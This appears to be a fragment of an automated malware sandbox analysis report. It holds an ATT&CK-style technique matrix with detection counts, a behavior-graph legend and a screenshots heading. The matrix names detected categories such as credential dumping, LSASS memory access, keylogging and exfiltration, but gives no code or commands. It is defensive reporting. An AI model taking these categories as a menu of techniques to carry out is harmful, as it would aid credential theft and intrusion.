            Valid AccountsWindows Management Instrumentation121Path InterceptionProcess Injection1Masquerading11OS Credential DumpingSecurity Software Discovery241Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion4LSASS MemoryVirtualization/Sandbox Evasion4Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting121NTDSSystem Information Discovery25Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.